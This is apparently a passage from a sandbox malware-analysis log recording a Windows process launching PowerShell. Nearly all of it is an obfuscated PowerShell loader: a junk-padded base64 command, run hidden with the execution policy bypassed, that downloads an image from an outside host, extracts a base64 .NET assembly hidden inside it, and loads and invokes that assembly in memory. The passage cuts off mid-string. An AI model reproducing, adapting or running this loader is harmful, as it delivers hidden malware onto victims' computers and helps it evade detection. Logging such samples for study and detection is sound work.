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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('ShUWCcUzBkdI','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000590
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: -command "$Codigo = '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CcUzBkdIZQB4ShUWCcUzBkdIE8ShUWCcUzBkdIZgShUWCcUzBkdIoShUWCcUzBkdICQShUWCcUzBkdIZQBuShUWCcUzBkdIGQShUWCcUzBkdIRgBsShUWCcUzBkdIGEShUWCcUzBkdIZwShUWCcUzBkdIpShUWCcUzBkdIDsShUWCcUzBkdIJShUWCcUzBkdIBzShUWCcUzBkdIHQShUWCcUzBkdIYQByShUWCcUzBkdIHQShUWCcUzBkdISQBuShUWCcUzBkdIGQShUWCcUzBkdIZQB4ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQBnShUWCcUzBkdIGUShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIwShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQBhShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIZQBuShUWCcUzBkdIGQShUWCcUzBkdISQBuShUWCcUzBkdIGQShUWCcUzBkdIZQB4ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQBnShUWCcUzBkdIHQShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBJShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIHgShUWCcUzBkdIOwShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBJShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIHgShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIrShUWCcUzBkdID0ShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBGShUWCcUzBkdIGwShUWCcUzBkdIYQBnShUWCcUzBkdIC4ShUWCcUzBkdITShUWCcUzBkdIBlShUWCcUzBkdIG4ShUWCcUzBkdIZwB0ShUWCcUzBkdIGgShUWCcUzBkdIOwShUWCcUzBkdIkShUWCcUzBkdIGIShUWCcUzBkdIYQBzShUWCcUzBkdIGUShUWCcUzBkdINgShUWCcUzBkdI0ShUWCcUzBkdIEwShUWCcUzBkdIZQBuShUWCcUzBkdIGcShUWCcUzBkdIdShUWCcUzBkdIBoShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIPQShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIZQBuShUWCcUzBkdIGQShUWCcUzBkdISQBuShUWCcUzBkdIGQShUWCcUzBkdIZQB4ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIcwB0ShUWCcUzBkdIGEShUWCcUzBkdIcgB0ShUWCcUzBkdIEkShUWCcUzBkdIbgBkShUWCcUzBkdIGUShUWCcUzBkdIeShUWCcUzBkdIShUWCcUzBkdI7ShUWCcUzBkdICQShUWCcUzBkdIYgBhShUWCcUzBkdIHMShUWCcUzBkdIZQShUWCcUzBkdI2ShUWCcUzBkdIDQShUWCcUzBkdIQwBvShUWCcUzBkdIG0ShUWCcUzBkdIbQBhShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdID0ShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIGkShUWCcUzBkdIbQBhShUWCcUzBkdIGcShUWCcUzBkdIZQBUShUWCcUzBkdIGUShUWCcUzBkdIeShUWCcUzBkdIB0ShUWCcUzBkdIC4ShUWCcUzBkdIUwB1ShUWCcUzBkdIGIShUWCcUzBkdIcwB0ShUWCcUzBkdIHIShUWCcUzBkdIaQBuShUWCcUzBkdIGcShUWCcUzBkdIKShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBJShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIHgShUWCcUzBkdILShUWCcUzBkdIShUWCcUzBkdIg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